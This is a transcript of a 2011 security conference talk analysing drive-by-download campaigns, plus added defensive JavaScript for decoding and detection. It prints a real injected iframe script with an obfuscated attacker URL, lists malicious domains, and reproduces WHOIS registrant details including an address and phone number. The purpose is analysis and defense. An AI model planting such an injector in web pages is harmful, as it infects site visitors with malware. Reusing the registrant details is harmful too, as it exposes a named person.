Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes
DESCRIPTION
International Security Conference "ZeroNights 2011" - http://www.zeronights.org/
TRANSCRIPT
![Page 1: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/1.jpg)
Drive-By-Download Attack Evolution Before and After Vulnerability Disclosure
Vladimir B. Kropotov, TBINFORM (TNK-BP Group)
![Page 2: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/2.jpg)
Drive-By-Download
• Hackers distribute malware by "poisoning" legitimate websites
• The hacker injects malicious iframes into the site's HTML content
• Vulnerabilities in browsers, Acrobat, Java, Flash Player, etc. are used by the attacker to run code on the visitor's machine
You just want information about insurance, nothing more, but…
![Page 3: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/3.jpg)
What does it look like?
Diagram, read left to right:
• PC connected to the Internet visits a known (legitimate) server that carries the injected iframe
• The iframe pulls content from an intermediate server controlled by the attacker, which collects OS, browser and plugin INFO from the visitor
• Exploit server controlled by the attacker delivers the exploit that matches that information
• Malware server controlled by the attacker delivers the malware; host ready
![Page 4: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/4.jpg)
How we find it?
IDS event, fields as logged:
Date/Time: 2011-08-05 10:44:53 YEKST
Tag Name: PDF_XFA_Script
Observance Type: Intrusion Detection
Cleared Flag: false
Target IP Address: 10.X.X.X
Target Object Name: 9090
Target Object Type: Target Port
Target Service: unknown
Source IP Address: 10.X.X.Y
Source Port Name: 2359
compressed: zlib
server: total.logeater.org
URL: //images/np/45eebb038bd46a63e08665f3081fb408/6cd14aca59271182c8a04159f9ad2804.pdf
![Page 5: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/5.jpg)
How we find it? The same PDF_XFA_Script event (2011-08-05 10:44:53, 10.X.X.Y → 10.X.X.X:9090, server total.logeater.org, URL //images/np/45eebb038bd46a63e08665f3081fb408/6cd14aca59271182c8a04159f9ad2804.pdf), read from the user's side:
DOES THE USER NEED IT?? A zlib-compressed PDF from an unknown host under an //images/np/<hex>/<hex>.pdf path is not something the user asked for.
![Page 6: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/6.jpg)
First indicators
Date/Time: 2011-07-26 11:24:37
Tag Name: PDF_XFA_Script
arg: 3592ba48df0fae9e5f5c5b09535a070d0b04020600510f0c56075c06040750
compressed: zlib
server: mamjhvbw.dyndns.pro
URL: /ghqlv3ym/
![Page 7: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/7.jpg)
First indicators
Date/Time: 2011-08-18 19:00:13
Tag Name: ActiveX_Warning
clsid: CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA (the Java Deployment Toolkit control, i.e. the script probes for installed Java)
server: e1in.in
URL: /stat/574a353789f/pda.js

Date/Time: 2011-08-16 13:24:44
Tag Name: ActiveX_Warning
clsid: CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA
server: skipetar.in
URL: /jb/pda.js
![Page 8: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/8.jpg)
First indicators
Date/Time: 2011-08-18 19:00:13
Tag Name: PDF_XFA_Script
arg: host=http://e1in.in/stat&u=root
compressed: zlib
server: e1in.in
URL: /stat/574a353789f/lastrger.php

Date/Time: 2011-08-09 10:17:14
Tag Name: PDF_XFA_Script
arg: host=http://inaptly.in&b=486def4
compressed: gzip
server: inaptly.in
URL: /jb/lastrger.php

Date/Time: 2011-08-14 14:06:28
Tag Name: PDF_XFA_Script
arg: host=http://oligist.in&b=486def4
compressed: gzip
server: oligist.in
URL: /jb/lastrger.php
![Page 9: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/9.jpg)
First indicators (the six events from the three preceding slides collected on one slide)
![Page 10: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/10.jpg)
Example: o-strahovanie.ru
![Page 11: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/11.jpg)
Example: o-strahovanie.ru
![Page 12: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/12.jpg)
Example: o-strahovanie.ru SEP 02
Injected script found in the page (preceded by the marker "============ bbb ============"); the time(), getCookie() and setCookie() helpers on document.xmlSettings are defined elsewhere in the injection and are not shown:

    document.xmlSettings.if_ik = false;
    if (window.localStorage) {
        if (window.localStorage.if_ik) {
            // 2592000 s = 30 days: fire again only if the last delivery is older than that
            if (parseInt(window.localStorage.if_ik) + 2592000 < document.xmlSettings.time())
                document.xmlSettings.if_ik = true;
        } else document.xmlSettings.if_ik = true;
    } else { // 4 osel  ("osel", donkey, is Russian jargon for Internet Explorer: cookie fallback for browsers without localStorage)
        if (document.xmlSettings.getCookie('if_ik')) {
            if (parseInt(document.xmlSettings.getCookie('if_ik')) + 2592000 < document.xmlSettings.time())
                document.xmlSettings.if_ik = true;
        } else document.xmlSettings.if_ik = true;
    }
    if (document.xmlSettings.if_ik) {
        // remember this visit, in localStorage or in a one-year cookie
        if (window.localStorage) window.localStorage.if_ik = document.xmlSettings.time();
        else document.xmlSettings.setCookie('if_ik', document.xmlSettings.time(), { expires: (document.xmlSettings.time() + 86400*365) });
        // 1x1 iframe positioned off-screen
        document.xmlSettings.iframe = document.createElement('iframe');
        document.xmlSettings.iframe.style.cssText = 'height:1px;position:absolute;width:1px;border:none;left:-5000px;';
        document.body.appendChild(document.xmlSettings.iframe);
        // URL assembled from fragments so the hostname never appears literally in the page source
        document.xmlSettings.iframe.src = 'htt'+'p://'+'disreg'+'arding.i'+'n/xtqd2/08.p'+'hp';
    }

Cookie left on the client (IE cookie-file dump): name if_ik, value 1315314771, site www.o-strahovanie.ru/, followed by the cookie-file flag and timestamp fields 1600429305625633310239293001403230174358*
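The following is an added example, not code from the talk: it recovers what the injected script does without running it. It joins the fragmented iframe URL statically, decodes the if_ik cookie value (the script stores its time() result, a Unix timestamp in seconds), and re-implements the 30-day throttle against a plain object standing in for localStorage or the cookie jar, which is an assumption since the script's time()/getCookie()/setCookie() helpers are not on the slides. The throttle explains why a single analyst visit to the site can see the iframe once and then nothing for a month.

```javascript
// Added example (not from the talk): static decoding and behavioural
// re-implementation of the injected o-strahovanie.ru script.
// Assumption: `store` is a plain object standing in for window.localStorage
// (or the cookie fallback) and `now` is seconds since the epoch, which is what
// the script's unshown time() helper must return for "+ 2592000" to make sense.

const THROTTLE_SECONDS = 2592000; // hard-coded in the injected script: 30 days

// Constructed input: the tail of the injected script exactly as the talk shows it.
const INJECTED_TAIL =
  "document.xmlSettings.iframe.src='htt'+'p://'+'disreg'+'arding.i'+'n/xtqd2/08.p'+'hp';";

// Join a chain of single-quoted literals ('a'+'b'+'c') without eval.
function joinStringConcat(expr) {
  const parts = [];
  const re = /'((?:[^'\\]|\\.)*)'/g;
  let m;
  while ((m = re.exec(expr)) !== null) parts.push(m[1]);
  return parts.join("");
}

// Find the `.src=` assignment and decode its right-hand side; null if absent.
function extractIframeSrc(script) {
  const m = /\.src\s*=\s*((?:'[^']*'\s*\+?\s*)+);/.exec(script);
  return m ? joinStringConcat(m[1]) : null;
}

// The script's visitor throttle. Returns true when the hidden iframe would be
// created on this visit, and records the delivery time like the original does.
function wouldInjectIframe(store, now) {
  let inject;
  if (store.if_ik === undefined) {
    inject = true;                                              // first visit from this browser
  } else {
    inject = parseInt(store.if_ik, 10) + THROTTLE_SECONDS < now; // more than 30 days since last delivery
  }
  if (inject) store.if_ik = String(now);
  return inject;
}

// The if_ik value is that epoch timestamp; decode it for the incident timeline.
function ifIkToIso(value) {
  return new Date(parseInt(value, 10) * 1000).toISOString();
}

// Walk one browser through several visits (epoch seconds) and report which
// visits would have received the iframe.
function simulateVisits(timestamps) {
  const store = {};
  return timestamps.map((t) => wouldInjectIframe(store, t));
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(extractIframeSrc(INJECTED_TAIL));   // http://disregarding.in/xtqd2/08.php
  console.log(ifIkToIso("1315314771"));           // 2011-09-06T13:12:51.000Z
  const t0 = 1315314771;
  console.log(simulateVisits([t0, t0 + 3600, t0 + 31 * 86400])); // [ true, false, true ]
}
```

The cookie value on the slide, 1315314771, decodes to 2011-09-06 13:12:51 UTC, so the dump was taken a few days after the 2 September capture; a second visit from the same browser inside 30 days produces no iframe at all, which is why a one-off check of the page by an analyst or a reputation crawler can come back clean.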
![Page 13: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/13.jpg)
Example: o-strahovanie.ru (zoom on the else branch and the iframe creation of the script above)
![Page 14: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/14.jpg)
Example: o-strahovanie.ru
The fragments 'htt'+'p://'+'disreg'+'arding.i'+'n/xtqd2/08.p'+'hp' concatenated:
iframe.src = 'http://disregarding.in/xtqd2/08.php'
![Page 15: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/15.jpg)
Drive By Download o-strahovanie.ru Sep 02
• PC connected to the Internet → known server with iframe (o-strahovanie.ru)
• Intermediate server: disregarding.in, receives OS, browser and plugin INFO
• Exploit delivered: NO. Exploit server: NO
• Malware server: NO. No payload reached the host on this date
![Page 16: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/16.jpg)
Drive By Download o-strahovanie.ru Sep 12
• PC connected to the Internet → known server with iframe (o-strahovanie.ru)
• Intermediate server: disregarding.in, receives OS, browser and plugin INFO
• Exploit server: chamberwoman.in, janiculum.in, delivers the exploit
• Malware server: chamberwoman.in, janiculum.in, delivers the malware; host ready
![Page 17: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/17.jpg)
Example: o-strahovanie.ru
Domain Name: DISREGARDING.IN
Created On: 14-Jul-2011 11:09:59 UTC
Registrant Name: Russell Rosario
Registrant Street1: 136 Oakdale Avenue
City: Winter Haven
Registrant Country: US
Email: [email protected]
Name Server: NS1.PRIDES.ME, NS2.PRIDES.ME

Domain Name: JANICULUM.IN, CHAMBERWOMAN.IN
Created On: 12-Sep-2011 08:14 UTC
Registrant Name: Russell Rosario
![Page 18: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/18.jpg)
Example: o-strahovanie.ru
DISREGARDING.IN (created 14-Jul-2011) and JANICULUM.IN, CHAMBERWOMAN.IN (created 12-Sep-2011): two months apart, the same registrant, Russell Rosario.
No payload, because there were no payload requests? Are they looking for customers?
![Page 19: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/19.jpg)
Example: o-strahovanie.ru (full WHOIS record)
Domain ID: D5165642-AFIN
Domain Name: DISREGARDING.IN
Created On: 14-Jul-2011 11:09:59 UTC
Registrant Name: Russell Rosario
Registrant Street1: 136 Oakdale Avenue
City: Winter Haven
Registrant Country: US
Email: [email protected]
Name Server: NS1.PRIDES.ME, NS2.PRIDES.ME
![Page 20: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/20.jpg)
Russell Rosario
Other domains with the same registrant, created within seconds of each other:
filtrated.in, Created On: 14-Jul-2011 11:09:56 UTC
raptnesses.in, Created On: 14-Jul-2011 11:09:56 UTC
tansies.in, Created On: 14-Jul-2011 11:10:03 UTC
Full record:
Domain Name: FILTRATED.IN
Created On: 14-Jul-2011 11:09:53 UTC
Sponsoring Registrar: Directi Web Services Pvt. Ltd. (R118-AFIN)
Registrant ID: TS_16731618
Registrant Name: Russell Rosario
Registrant Street1: 136 Oakdale Avenue
Registrant City: Winter Haven
Registrant State/Province: Florida
Registrant Postal Code: 33830
Registrant Country: US
Registrant Phone: +1.8635571308
Email: [email protected]
But Sally Doesn't Know…
![Page 21: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/21.jpg)
Attack before public disclosure
• Primary location for malicious sites: .IN
• Physical server location by IP address: Romania
• Registrant of record: Russell Rosario
• Domains are new (registered days to weeks before they are first seen in use)
![Page 22: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/22.jpg)
Domain owner is the same
Domain Name | Created On | Registrant Name
--- | --- | ---
irrefutably.in | 15-Jul-2011 11:00:21 UTC | Russell Rosario
comprador.in | 25-Jul-2011 05:59:54 UTC | Russell Rosario
hyalines.in | 29-Jul-2011 09:39:33 UTC | Russell Rosario
suffrago.in | 01-Aug-2011 05:35:12 UTC | Russell Rosario
ruritanian.in | 01-Aug-2011 05:35:50 UTC | Russell Rosario
Timeline marker: 20-Jul-2011, Acrobat vulnerability reported to the vendor (the registrations above bracket that date)
![Page 23: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/23.jpg)
Vulnerability reported to vendor
VUPEN Security Research advisories:
• Adobe Acrobat and Reader PCX Processing Heap Overflow Vulnerability
• Adobe Acrobat and Reader IFF Processing Heap Overflow Vulnerability
• Adobe Acrobat and Reader Picture Dimensions Heap Overflow Vulnerability
• Adobe Acrobat and Reader TIFF BitsPerSample Heap Overflow Vulnerability
X. DISCLOSURE TIMELINE
2011-07-20 - Vulnerability Discovered by VUPEN and shared with TPP customers
2011-09-14 - Public disclosure

ZDI-11-310: Adobe Reader Compound Glyph Index Sign Extension Remote Code Execution Vulnerability
Disclosure Timeline:
2011-07-20 - Vulnerability reported to vendor
2011-10-26 - Coordinated public release of advisory

ZDI-11-316: Apple QuickTime H264 Matrix Conversion Remote Code Execution Vulnerability
Disclosure Timeline:
2011-07-20 - Vulnerability reported to vendor
2011-10-27 - Coordinated public release of advisory
![Page 24: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/24.jpg)
Harvesting machine started
Domain Name | Created On | Registrant Name
--- | --- | ---
microdrili.in | 05-Aug-2011 07:13:08 UTC | Russell Rosario
oligist.in | 05-Aug-2011 07:13:12 UTC | Russell Rosario
provost.in | 05-Aug-2011 07:13:18 UTC | Russell Rosario
vaginalitis.in | 05-Aug-2011 07:13:25 UTC | Russell Rosario
kremlinology.in | 05-Aug-2011 07:13:35 UTC | Russell Rosario
invariance.in | 05-Aug-2011 07:13:41 UTC | Russell Rosario
alleghenian.in | 05-Aug-2011 07:13:48 UTC | Russell Rosario
dandifies.in | 05-Aug-2011 07:14:06 UTC | Russell Rosario
xenophoby.in | 05-Aug-2011 07:14:09 UTC | Russell Rosario
alliaria.in | 05-Aug-2011 07:14:15 UTC | Russell Rosario
skipetar.in | 05-Aug-2011 07:14:21 UTC | Russell Rosario
inaptly.in | 05-Aug-2011 07:15:05 UTC | Russell Rosario
allhallowtide.in | 05-Aug-2011 07:15:20 UTC | Russell Rosario
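The following is an added example and not part of the talk. It does, in code, what the "How we find it?", "First indicators" and registration slides do by hand: parse the IDS alert records in the key/value form the slides print, tie the throw-away domains to one kit by the file names they serve (lastrger.php, pda.js), measure each domain's age at the time of its first alert from the WHOIS "Created On" values, and place the earliest alert on the VUPEN/ZDI disclosure timeline. The alert records and creation dates are the ones on the slides; the only assumption is that alert timestamps are YEKST (UTC+6), the zone printed on the first alert.

```javascript
// Added example (not from the talk): correlate the slides' IDS alerts with the
// WHOIS creation dates and the vendor/public disclosure dates quoted in the talk.
// Assumption: alert times are YEKST (UTC+6), as on the first alert slide.

const VENDOR_NOTIFIED = "2011-07-20";
const PUBLIC_DISCLOSURE = "2011-09-14";
const ALERT_UTC_OFFSET_HOURS = 6; // YEKST

// Alert records in the key/value form the slides print them in (a ":" prefix on
// the last fields appears on some slides and is tolerated by the parser).
const ALERT_TEXT = `
Date/Time 2011-07-26 11:24:37
Tag Name PDF_XFA_Script
server mamjhvbw.dyndns.pro
URL /ghqlv3ym/
Date/Time 2011-08-09 10:17:14
Tag Name PDF_XFA_Script
server inaptly.in
URL /jb/lastrger.php
Date/Time 2011-08-14 14:06:28
Tag Name PDF_XFA_Script
:server oligist.in
:URL /jb/lastrger.php
Date/Time 2011-08-16 13:24:44
Tag Name ActiveX_Warning
server skipetar.in
URL /jb/pda.js
Date/Time 2011-08-18 19:00:13
Tag Name ActiveX_Warning
server e1in.in
URL /stat/574a353789f/pda.js
`;

// WHOIS "Created On" values from the slides for the domains the alerts name.
const REGISTERED = {
  "oligist.in": "2011-08-05T07:13:12Z",
  "skipetar.in": "2011-08-05T07:14:21Z",
  "inaptly.in": "2011-08-05T07:15:05Z",
};

// One object per alert; a "Date/Time" line starts a new record.
function parseAlerts(text) {
  const alerts = [];
  for (const line of text.split("\n")) {
    const m = /^:?(Date\/Time|Tag Name|server|URL)\s+(.+)$/.exec(line.trim());
    if (!m) continue;
    if (m[1] === "Date/Time") alerts.push({ time: m[2] });
    else alerts[alerts.length - 1][m[1] === "Tag Name" ? "tag" : m[1]] = m[2];
  }
  return alerts;
}

// "2011-08-14 14:06:28" in YEKST -> epoch milliseconds.
function alertTimeToUtc(t) {
  return Date.parse(t.replace(" ", "T") + "Z") - ALERT_UTC_OFFSET_HOURS * 3600 * 1000;
}

// Group servers by the file name the URL ends in: the same lastrger.php / pda.js
// pair on different hosts is one kit behind many disposable domains.
function clusterByBasename(alerts) {
  const clusters = {};
  for (const a of alerts) {
    const base = a.URL.replace(/\/+$/, "").split("/").pop();
    (clusters[base] = clusters[base] || new Set()).add(a.server);
  }
  return Object.fromEntries(Object.entries(clusters).map(([k, v]) => [k, [...v].sort()]));
}

// Days (one decimal) from registration to the first alert naming the domain;
// null when the slides give no creation date for it.
function domainAgeAtFirstSighting(alerts, registered) {
  const firstSeen = {};
  for (const a of alerts) {
    const t = alertTimeToUtc(a.time);
    if (!(a.server in firstSeen) || t < firstSeen[a.server]) firstSeen[a.server] = t;
  }
  const ages = {};
  for (const [host, t] of Object.entries(firstSeen)) {
    ages[host] = host in registered
      ? Math.round(((t - Date.parse(registered[host])) / 86400000) * 10) / 10
      : null;
  }
  return ages;
}

// Whole calendar days from `from` to `to`, both "YYYY-MM-DD".
function calendarDays(from, to) {
  return Math.round((Date.parse(to + "T00:00:00Z") - Date.parse(from + "T00:00:00Z")) / 86400000);
}

// The earliest alert relative to the vendor notification and the public advisory.
function earliestSightingOnTimeline(alerts) {
  const day = alerts.map((a) => a.time.slice(0, 10)).sort()[0];
  return {
    day,
    daysAfterVendorNotified: calendarDays(VENDOR_NOTIFIED, day),
    daysBeforePublicDisclosure: calendarDays(day, PUBLIC_DISCLOSURE),
  };
}

if (typeof require !== "undefined" && require.main === module) {
  const alerts = parseAlerts(ALERT_TEXT);
  console.log(clusterByBasename(alerts), domainAgeAtFirstSighting(alerts, REGISTERED));
  console.log(earliestSightingOnTimeline(alerts)); // 2011-07-26: 6 days after the vendor report, 50 before public disclosure
}
```

On the slides' own numbers, inaptly.in, oligist.in and skipetar.in were between four and eleven days old when the IDS first saw them, and the first PDF_XFA_Script alert of the series predates the public advisory by fifty days. Domain age at first sighting is therefore a usable filter for this kind of traffic, and it needs no signature for the exploit itself.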
![Page 25: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/25.jpg)
But maybe someone knows?
• Spamlists
• AV Vendors
• Safebrowsing
• Securityfocus
![Page 26: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/26.jpg)
Spamlists, Aug 19
![Page 27: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/27.jpg)
AV Vendors, Aug 18
![Page 28: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/28.jpg)
Safebrowsing Aug 20
![Page 29: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/29.jpg)
Securityfocus Sep 07
Sent: Wednesday, September 07, 2011 11:31 PM
Subject: There is a strange GET request header in all web pages of my site? I'm worried about a Trojan attack!
Today I found that Kasper Anti Virus has blocked my site and says to the clients that this site is affected by a Trojan. I traced my site with the Fiddler debugging tool and I found that every time I send a request to the site a GET request handler is established to the following URL:
"http://carlos.c0m.li/iframe.php?id=v4pfa24nw91yhoszkdmoh413ywv6cp7"
![Page 30: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/30.jpg)
PDF vulnerabilities public disclosure Sep 14. What to expect?
![Page 31: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/31.jpg)
PDF vulnerabilities public disclosure Sep 14. What to expect?
NO GOOD NEWS, JUST EPIC FAIL for site administrators
![Page 32: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/32.jpg)
No good news. Hundreds of domains were registered, many of them lookalikes of well-known Russian sites (klerk.ru, kp.ru, obozrevatel, interfax, rzd.ru):
ITALIA-NEW.IN
BANER-KLERK.RU
BANK-KLERK.RU
BANNER-KLERK.RU
BLOGS-KLERK.RU
BUH-KLERK.RU
DAILY-KP.RU
FORUM-KLERK.RU
I-OBOZREVATEL.RU
INTERFAX-REGION.RU
JOB-KLERK.RU
KLERK-BANK.RU
KLERK-BANKIR.RU
KLERK-BIZ.RU
KLERK-BOSS.RU
KLERK-BUH.RU
KLERK-EVEN.RU
KLERK-EVENTS.RU
KLERK-LAW.RU
KLERK-NEW.RU
KLERK-NEWS.RU
KLERK-REKLAMA.RU
KLERK-RU.RU
KLERK-WORK.RU
KLERK2.RU
OBOZREVATEL-RU.RU
OBOZREVATELRU.RU
WIKI-KLERK.RU
PRESS-RZD.RU
RZD-RZD.RU
IPGEOBASE.IN
* * *
![Page 33: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/33.jpg)
“New generation”
• PC connected to the Internet → known server with iframe
• Intermediate server controlled by the attacker collects OS, browser and plugin INFO
• Exploit server controlled by the attacker delivers the exploit
• Malware server controlled by the attacker delivers the malware; host ready
• New node: other known server NOT controlled by the attacker, to which the intermediate server sends visitors most of the time (see the next slide)
![Page 34: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/34.jpg)
Attack after public disclosure
• Primary location for malicious sites: .IN, .RU, .CX.CC, .BIZ, .INFO, …
• Physical server location by IP address: international
• Domains registered to different spurious persons
• Domain lifetime ≈ time until it appears on blacklists
• The injected iframe refers to the malicious server for only a short period of the day and to a well-known, legitimate server almost all day long (blacklist evasion technique)
• If you don't know the exact malware URL, the site redirects you to the well-known server
• Different types of payload used: password stealers, Winlockers, and even “normal” (or another ZD) files installed
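The following is an added example and not part of the talk: detection logic for the blacklist-evasion pattern in the two bullets above, run over a constructed proxy log. Because the injected iframe points at the throw-away host only during a short window and at an innocent, well-known host the rest of the day, a one-off reputation check made outside the window sees nothing wrong; grouping the whole day's hits by (referer, destination) and measuring each destination's active window picks the short-lived host out. Every host name and log line below is made up (.example domains), and the line format is a simplified one, not the format of any particular proxy.

```javascript
// Added example (not from the talk): find destinations that a compromised page
// sent several visitors to within a short window, against a constructed proxy
// log. Hosts and lines are made up; the format is "HH:MM:SS client URL referer".

const PROXY_LOG = `
08:02:11 10.0.0.11 http://cdn-decoy.example/x.js http://compromised-news.example/
09:15:40 10.0.0.12 http://cdn-decoy.example/x.js http://compromised-news.example/
11:48:03 10.0.0.13 http://cdn-decoy.example/x.js http://compromised-news.example/
12:30:05 10.0.0.14 http://xtqd2-kit.example/08.php http://compromised-news.example/
12:31:17 10.0.0.14 http://xtqd2-kit.example/load.php?b=486def4 http://xtqd2-kit.example/08.php
12:38:49 10.0.0.15 http://xtqd2-kit.example/08.php http://compromised-news.example/
12:41:22 10.0.0.16 http://xtqd2-kit.example/08.php http://compromised-news.example/
14:05:30 10.0.0.17 http://cdn-decoy.example/x.js http://compromised-news.example/
17:22:08 10.0.0.18 http://cdn-decoy.example/x.js http://compromised-news.example/
19:47:51 10.0.0.19 http://cdn-decoy.example/x.js http://compromised-news.example/
`;

// "HH:MM:SS" -> seconds since midnight.
function toSeconds(hms) {
  const [h, m, s] = hms.split(":").map(Number);
  return h * 3600 + m * 60 + s;
}

// One entry per line with the destination and referer reduced to host names.
function parseProxyLog(text) {
  return text.trim().split("\n").map((line) => {
    const [time, client, url, referer] = line.trim().split(/\s+/);
    return {
      sec: toSeconds(time),
      client,
      host: new URL(url).host,
      referer: referer === "-" ? null : new URL(referer).host,
    };
  });
}

// For every destination reached directly from the injected page: hit count,
// distinct clients, and the span between first and last hit in minutes.
function destinationWindows(entries, injectedReferer) {
  const windows = {};
  for (const e of entries) {
    if (e.referer !== injectedReferer) continue;   // follow-on kit requests are not counted here
    const w = windows[e.host] || (windows[e.host] = { first: e.sec, last: e.sec, hits: 0, clients: new Set() });
    w.first = Math.min(w.first, e.sec);
    w.last = Math.max(w.last, e.sec);
    w.hits += 1;
    w.clients.add(e.client);
  }
  for (const w of Object.values(windows)) {
    w.clients = w.clients.size;
    w.activeMinutes = Math.round(((w.last - w.first) / 60) * 10) / 10;
  }
  return windows;
}

// Destinations that several clients reached, but only inside a short window:
// the ones to pull out of the day's traffic and inspect, whatever the blacklists say.
function shortLivedDestinations(windows, maxMinutes) {
  return Object.entries(windows)
    .filter(([, w]) => w.clients >= 2 && w.activeMinutes <= maxMinutes)
    .map(([host]) => host)
    .sort();
}

if (typeof require !== "undefined" && require.main === module) {
  const windows = destinationWindows(parseProxyLog(PROXY_LOG), "compromised-news.example");
  console.log(windows);
  console.log(shortLivedDestinations(windows, 60)); // [ 'xtqd2-kit.example' ]
}
```

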